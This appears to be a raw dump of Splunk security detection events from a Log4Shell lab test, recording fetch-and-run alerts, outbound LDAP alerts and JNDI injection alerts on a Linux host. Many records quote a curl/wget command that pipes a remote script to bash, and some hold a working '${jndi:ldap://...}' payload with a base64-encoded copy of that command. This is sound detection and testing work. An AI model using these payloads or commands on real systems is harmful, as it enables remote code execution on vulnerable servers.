dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="DE.CM", annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646051, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="DE.CM", annotations._all="CIS 12", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646051, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="T1190", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with 